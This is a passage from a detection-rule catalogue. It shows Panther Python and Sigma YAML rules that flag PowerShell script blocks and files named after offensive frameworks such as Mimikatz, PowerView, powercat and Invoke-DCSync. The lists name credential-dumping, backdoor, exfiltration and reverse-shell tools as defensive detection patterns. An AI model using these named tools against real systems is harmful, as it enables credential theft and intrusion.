                    "Do-Exfiltration" in event.deep_get("ScriptBlockText", default=""),
                    "Enable-ADIDNSNode" in event.deep_get("ScriptBlockText", default=""),
                    "Enabled-DuplicateToken" in event.deep_get("ScriptBlockText", default=""),
                    "Exploit-Jboss" in event.deep_get("ScriptBlockText", default=""),
                    "Export-ADRCSV" in event.deep_get("ScriptBlockText", default=""),
                    "Export-ADRExcel" in event.deep_get("ScriptBlockText", default=""),
                    "Export-ADRHTML" in event.deep_get("ScriptBlockText", default=""),
                    "Export-ADRJSON" in event.deep_get("ScriptBlockText", default=""),
                    "Export-ADRXML" in event.deep_get("ScriptBlockText", default=""),
                    "Find-Fruit" in event.deep_get("ScriptBlockText", default=""),
                    "Find-GPOLocation" in event.deep_get("ScriptBlockText", default=""),
                    "Find-TrustedDocuments" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ADIDNSNodeAttribute" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ADIDNSNodeOwner" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ADIDNSNodeTombstoned" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ADIDNSPermission" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ADIDNSZone" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ChromeDump" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ClipboardContents" in event.deep_get("ScriptBlockText", default=""),
                    "Get-FoxDump" in event.deep_get("ScriptBlockText", default=""),
                    "Get-GPPPassword" in event.deep_get("ScriptBlockText", default=""),
                    "Get-IndexedItem" in event.deep_get("ScriptBlockText", default=""),
                    "Get-KerberosAESKey" in event.deep_get("ScriptBlockText", default=""),
                    "Get-Keystrokes" in event.deep_get("ScriptBlockText", default=""),
                    "Get-LSASecret" in event.deep_get("ScriptBlockText", default=""),
                    "Get-PassHashes" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RegAlwaysInstallElevated" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RegAutoLogon" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RemoteBootKey" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RemoteCachedCredential" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RemoteLocalAccountHash" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RemoteLSAKey" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RemoteMachineAccountHash" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RemoteNLKMKey" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RickAstley" in event.deep_get("ScriptBlockText", default=""),
                    "Get-SecurityPackages" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ServiceFilePermission" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ServicePermission" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ServiceUnquoted" in event.deep_get("ScriptBlockText", default=""),
                    "Get-SiteListPassword" in event.deep_get("ScriptBlockText", default=""),
                    "Get-System" in event.deep_get("ScriptBlockText", default=""),
                    "Get-TimedScreenshot" in event.deep_get("ScriptBlockText", default=""),
                    "Get-UnattendedInstallFile" in event.deep_get("ScriptBlockText", default=""),
                    "Get-Unconstrained" in event.deep_get("ScriptBlockText", default=""),
                    "Get-USBKeystrokes" in event.deep_get("ScriptBlockText", default=""),
                    "Get-VaultCredential" in event.deep_get("ScriptBlockText", default=""),
                    "Get-VulnAutoRun" in event.deep_get("ScriptBlockText", default=""),
                    "Get-VulnSchTask" in event.deep_get("ScriptBlockText", default=""),
                    "Grant-ADIDNSPermission" in event.deep_get("ScriptBlockText", default=""),
                    "Gupt-Backdoor" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ACLScanner" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ADRecon" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ADSBackdoor" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-AgentSmith" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-AllChecks" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ARPScan" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-AzureHound" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-BackdoorLNK" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-BadPotato" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-BetterSafetyKatz" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-BypassUAC" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Carbuncle" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Certify" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ConPtyShell" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-CredentialInjection" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DAFT" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DCSync" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DinvokeKatz" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DllInjection" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DNSUpdate" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DNSExfiltrator" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DomainPasswordSpray" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DowngradeAccount" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-EgressCheck" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Eyewitness" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-FakeLogonScreen" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Farmer" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Get-RBCD-Threaded" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Gopher" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Grouper" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-HandleKatz" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ImpersonatedProcess" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ImpersonateSystem" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-InteractiveSystemPowerShell"
                    in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Internalmonologue" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Inveigh" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-InveighRelay" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-KrbRelay" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-LdapSignCheck" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Lockless" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-MalSCCM" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Mimikatz" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Mimikittenz" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-MITM6" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-NanoDump" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-NetRipper" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Nightmare" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-NinjaCopy" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-OfficeScrape" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-OxidResolver" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-P0wnedshell" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Paranoia" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PortScan" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PoshRatHttp" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PostExfil" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PowerDump" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PowerDPAPI" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PowerShellTCP" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PowerShellWMI" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PPLDump" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PsExec" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PSInject" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PsUaCme" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ReflectivePEInjection" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ReverseDNSLookup" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Rubeus" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-RunAs" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SafetyKatz" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SauronEye" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SCShell" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Seatbelt" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ServiceAbuse" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ShadowSpray" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Sharp" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Shellcode" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SMBScanner" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Snaffler" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Spoolsample" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SpraySinglePassword" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SSHCommand" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-StandIn" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-StickyNotesExtract" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SystemCommand" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Tasksbackdoor" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Tater" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Thunderfox" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ThunderStruck" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-TokenManipulation" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Tokenvator" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-TotalExec" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-UrbanBishop" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-UserHunter" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-VoiceTroll" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Whisker" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-WinEnum" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-winPEAS" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-WireTap" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-WmiCommand" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-WMIExec" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-WScriptBypassUAC" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Zerologon" in event.deep_get("ScriptBlockText", default=""),
                    "MailRaider" in event.deep_get("ScriptBlockText", default=""),
                    "New-ADIDNSNode" in event.deep_get("ScriptBlockText", default=""),
                    "New-HoneyHash" in event.deep_get("ScriptBlockText", default=""),
                    "New-InMemoryModule" in event.deep_get("ScriptBlockText", default=""),
                    "New-SOASerialNumberArray" in event.deep_get("ScriptBlockText", default=""),
                    "Out-Minidump" in event.deep_get("ScriptBlockText", default=""),
                    "PowerBreach" in event.deep_get("ScriptBlockText", default=""),
                    "powercat " in event.deep_get("ScriptBlockText", default=""),
                    "PowerUp" in event.deep_get("ScriptBlockText", default=""),
                    "PowerView" in event.deep_get("ScriptBlockText", default=""),
                    "Remove-ADIDNSNode" in event.deep_get("ScriptBlockText", default=""),
                    "Remove-Update" in event.deep_get("ScriptBlockText", default=""),
                    "Rename-ADIDNSNode" in event.deep_get("ScriptBlockText", default=""),
                    "Revoke-ADIDNSPermission" in event.deep_get("ScriptBlockText", default=""),
                    "Set-ADIDNSNode" in event.deep_get("ScriptBlockText", default=""),
                    "Show-TargetScreen" in event.deep_get("ScriptBlockText", default=""),
                    "Start-CaptureServer" in event.deep_get("ScriptBlockText", default=""),
                    "Start-Dnscat2" in event.deep_get("ScriptBlockText", default=""),
                    "Start-WebcamRecorder" in event.deep_get("ScriptBlockText", default=""),
                    "VolumeShadowCopyTools" in event.deep_get("ScriptBlockText", default=""),
                ]
            ),
            not any(
                [
                    "Get-SystemDriveInfo" in event.deep_get("ScriptBlockText", default=""),
                    "C:\\ProgramData\\Amazon\\EC2-Windows\\Launch\\Module\\"
                    in event.deep_get("ScriptBlockText", default=""),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Malicious PowerShell Commandlets - ScriptBlock
id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
related:
    - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c
      type: similar
    - id: 02030f2f-6199-49ec-b258-ea71b07e03dc
      type: similar
    - id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf
      type: obsolete
    - id: 83083ac6-1816-4e76-97d7-59af9a9ae46e
      type: obsolete
status: test
description: Detects Commandlet names from well-known PowerShell exploitation frameworks
references:
    - https://adsecurity.org/?p=2921
    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
    - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare
    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1
    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
    - https://github.com/HarmJ0y/DAMP
    - https://github.com/samratashok/nishang
    - https://github.com/DarkCoderSc/PowerRunAsSystem/
    - https://github.com/besimorhino/powercat
    - https://github.com/Kevin-Robertson/Powermad
    - https://github.com/adrecon/ADRecon
    - https://github.com/adrecon/AzureADRecon
    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/
    - https://github.com/Arno0x/DNSExfiltrator/
author: Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer
date: 2017-03-05
modified: 2025-12-10
tags:
    - attack.execution
    - attack.discovery
    - attack.t1482
    - attack.t1087
    - attack.t1087.001
    - attack.t1087.002
    - attack.t1069.001
    - attack.t1069.002
    - attack.t1069
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains:
            # Note: Please ensure alphabetical order when adding new entries
            - 'Add-Exfiltration'
            - 'Add-Persistence'
            - 'Add-RegBackdoor'
            - 'Add-RemoteRegBackdoor'
            - 'Add-ScrnSaveBackdoor'
            - 'ConvertTo-Rc4ByteStream'
            - 'Decrypt-Hash'
            - 'Disable-ADIDNSNode'
            - 'Do-Exfiltration'
            - 'Enable-ADIDNSNode'
            - 'Enabled-DuplicateToken'
            - 'Exploit-Jboss'
            - 'Export-ADRCSV'
            - 'Export-ADRExcel'
            - 'Export-ADRHTML'
            - 'Export-ADRJSON'
            - 'Export-ADRXML'
            - 'Find-Fruit'
            - 'Find-GPOLocation'
            - 'Find-TrustedDocuments'
            - 'Get-ADIDNSNodeAttribute'
            - 'Get-ADIDNSNodeOwner'
            - 'Get-ADIDNSNodeTombstoned'
            - 'Get-ADIDNSPermission'
            - 'Get-ADIDNSZone'
            - 'Get-ChromeDump'
            - 'Get-ClipboardContents'
            - 'Get-FoxDump'
            - 'Get-GPPPassword'
            - 'Get-IndexedItem'
            - 'Get-KerberosAESKey'
            - 'Get-Keystrokes'
            - 'Get-LSASecret'
            - 'Get-PassHashes'
            - 'Get-RegAlwaysInstallElevated'
            - 'Get-RegAutoLogon'
            - 'Get-RemoteBootKey'
            - 'Get-RemoteCachedCredential'
            - 'Get-RemoteLocalAccountHash'
            - 'Get-RemoteLSAKey'
            - 'Get-RemoteMachineAccountHash'
            - 'Get-RemoteNLKMKey'
            - 'Get-RickAstley'
            - 'Get-SecurityPackages'
            - 'Get-ServiceFilePermission'
            - 'Get-ServicePermission'
            - 'Get-ServiceUnquoted'
            - 'Get-SiteListPassword'
            - 'Get-System'
            - 'Get-TimedScreenshot'
            - 'Get-UnattendedInstallFile'
            - 'Get-Unconstrained'
            - 'Get-USBKeystrokes'
            - 'Get-VaultCredential'
            - 'Get-VulnAutoRun'
            - 'Get-VulnSchTask'
            - 'Grant-ADIDNSPermission'
            - 'Gupt-Backdoor'
            - 'Invoke-ACLScanner'
            - 'Invoke-ADRecon'
            - 'Invoke-ADSBackdoor'
            - 'Invoke-AgentSmith'
            - 'Invoke-AllChecks'
            - 'Invoke-ARPScan'
            - 'Invoke-AzureHound'
            - 'Invoke-BackdoorLNK'
            - 'Invoke-BadPotato'
            - 'Invoke-BetterSafetyKatz'
            - 'Invoke-BypassUAC'
            - 'Invoke-Carbuncle'
            - 'Invoke-Certify'
            - 'Invoke-ConPtyShell'
            - 'Invoke-CredentialInjection'
            - 'Invoke-DAFT'
            - 'Invoke-DCSync'
            - 'Invoke-DinvokeKatz'
            - 'Invoke-DllInjection'
            - 'Invoke-DNSUpdate'
            - 'Invoke-DNSExfiltrator'
            - 'Invoke-DomainPasswordSpray'
            - 'Invoke-DowngradeAccount'
            - 'Invoke-EgressCheck'
            - 'Invoke-Eyewitness'
            - 'Invoke-FakeLogonScreen'
            - 'Invoke-Farmer'
            - 'Invoke-Get-RBCD-Threaded'
            - 'Invoke-Gopher'
            - 'Invoke-Grouper' # Also Covers Invoke-GrouperX
            - 'Invoke-HandleKatz'
            - 'Invoke-ImpersonatedProcess'
            - 'Invoke-ImpersonateSystem'
            - 'Invoke-InteractiveSystemPowerShell'
            - 'Invoke-Internalmonologue'
            - 'Invoke-Inveigh'
            - 'Invoke-InveighRelay'
            - 'Invoke-KrbRelay'
            - 'Invoke-LdapSignCheck'
            - 'Invoke-Lockless'
            - 'Invoke-MalSCCM'
            - 'Invoke-Mimikatz'
            - 'Invoke-Mimikittenz'
            - 'Invoke-MITM6'
            - 'Invoke-NanoDump'
            - 'Invoke-NetRipper'
            - 'Invoke-Nightmare'
            - 'Invoke-NinjaCopy'
            - 'Invoke-OfficeScrape'
            - 'Invoke-OxidResolver'
            - 'Invoke-P0wnedshell'
            - 'Invoke-Paranoia'
            - 'Invoke-PortScan'
            - 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps
            - 'Invoke-PostExfil'
            - 'Invoke-PowerDump'
            - 'Invoke-PowerDPAPI'
            - 'Invoke-PowerShellTCP'
            - 'Invoke-PowerShellWMI'
            - 'Invoke-PPLDump'
            - 'Invoke-PsExec'
            - 'Invoke-PSInject'
            - 'Invoke-PsUaCme'
            - 'Invoke-ReflectivePEInjection'
            - 'Invoke-ReverseDNSLookup'
            - 'Invoke-Rubeus'
            - 'Invoke-RunAs'
            - 'Invoke-SafetyKatz'
            - 'Invoke-SauronEye'
            - 'Invoke-SCShell'
            - 'Invoke-Seatbelt'
            - 'Invoke-ServiceAbuse'
            - 'Invoke-ShadowSpray'
            - 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
            - 'Invoke-Shellcode'
            - 'Invoke-SMBScanner'
            - 'Invoke-Snaffler'
            - 'Invoke-Spoolsample'
            - 'Invoke-SpraySinglePassword'
            - 'Invoke-SSHCommand'
            - 'Invoke-StandIn'
            - 'Invoke-StickyNotesExtract'
            - 'Invoke-SystemCommand'
            - 'Invoke-Tasksbackdoor'
            - 'Invoke-Tater'
            - 'Invoke-Thunderfox'
            - 'Invoke-ThunderStruck'
            - 'Invoke-TokenManipulation'
            - 'Invoke-Tokenvator'
            - 'Invoke-TotalExec'
            - 'Invoke-UrbanBishop'
            - 'Invoke-UserHunter'
            - 'Invoke-VoiceTroll'
            - 'Invoke-Whisker'
            - 'Invoke-WinEnum'
            - 'Invoke-winPEAS'
            - 'Invoke-WireTap'
            - 'Invoke-WmiCommand'
            - 'Invoke-WMIExec'
            - 'Invoke-WScriptBypassUAC'
            - 'Invoke-Zerologon'
            - 'MailRaider'
            - 'New-ADIDNSNode'
            - 'New-HoneyHash'
            - 'New-InMemoryModule'
            - 'New-SOASerialNumberArray'
            - 'Out-Minidump'
            - 'PowerBreach'
            - 'powercat '
            - 'PowerUp'
            - 'PowerView'
            - 'Remove-ADIDNSNode'
            - 'Remove-Update'
            - 'Rename-ADIDNSNode'
            - 'Revoke-ADIDNSPermission'
            - 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner
            - 'Show-TargetScreen'
            - 'Start-CaptureServer'
            - 'Start-Dnscat2'
            - 'Start-WebcamRecorder'
            - 'VolumeShadowCopyTools'
            # - 'Check-VM'
            # - 'Disable-MachineAccount'
            # - 'Enable-MachineAccount'
            # - 'Get-ApplicationHost'
            # - 'Get-MachineAccountAttribute'
            # - 'Get-MachineAccountCreator'
            # - 'Get-Screenshot'
            # - 'HTTP-Login'
            # - 'Install-ServiceBinary'
            # - 'Install-SSP'
            # - 'New-DNSRecordArray'
            # - 'New-MachineAccount'
            # - 'Port-Scan'
            # - 'Remove-MachineAccount'
            # - 'Set-MacAttribute'
            # - 'Set-MachineAccountAttribute'
            # - 'Set-Wallpaper'
    filter_optional_amazon_ec2:
        ScriptBlockText|contains:
            - Get-SystemDriveInfo  # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1
            - C:\ProgramData\Amazon\EC2-Windows\Launch\Module\  # false positive form Amazon EC2
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Malicious PowerShell Scripts - FileCreation

Detects the creation of known offensive powershell scripts used for exploitation

status test author Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein id f331aa1f-8c53-4fc3-b083-cc159bc971cb

panther query

def rule(event):
    if any(
        [
            any(
                [
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Add-ConstrainedDelegationBackdoor.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Add-Exfiltration.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Add-Persistence.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Add-RegBackdoor.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Add-RemoteRegBackdoor.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Add-ScrnSaveBackdoor.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\ADRecon.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\AzureADRecon.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\BadSuccessor.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Check-VM.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\ConvertTo-ROT13.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Copy-VSS.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Create-MultipleSessions.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\DNS_TXT_Pwnage.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\dnscat2.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Do-Exfiltration.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\DomainPasswordSpray.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Download_Execute.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Download-Execute-PS.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Enable-DuplicateToken.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Enabled-DuplicateToken.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Execute-Command-MSSQL.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Execute-DNSTXT-Code.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Execute-OnTime.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\ExetoText.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Exploit-Jboss.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Find-AVSignature.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Find-Fruit.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Find-GPOLocation.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Find-TrustedDocuments.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\FireBuster.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\FireListener.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-ApplicationHost.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-ChromeDump.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-ClipboardContents.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-ComputerDetail.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-FoxDump.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-GPPAutologon.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-GPPPassword.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-IndexedItem.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-Keystrokes.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-LSASecret.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-MicrophoneAudio.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-PassHashes.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-PassHints.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-RegAlwaysInstallElevated.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-RegAutoLogon.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-RickAstley.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-Screenshot.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-SecurityPackages.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-ServiceFilePermission.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-ServicePermission.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-ServiceUnquoted.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-SiteListPassword.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-System.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-TimedScreenshot.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-UnattendedInstallFile.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-Unconstrained.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-USBKeystrokes.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-VaultCredential.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-VulnAutoRun.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-VulnSchTask.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-WebConfig.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-WebCredentials.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-WLAN-Keys.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Gupt-Backdoor.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\HTTP-Backdoor.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\HTTP-Login.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Install-ServiceBinary.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Install-SSP.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ACLScanner.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ADSBackdoor.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-AmsiBypass.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-ARPScan.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-BackdoorLNK.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-BadPotato.ps1"),
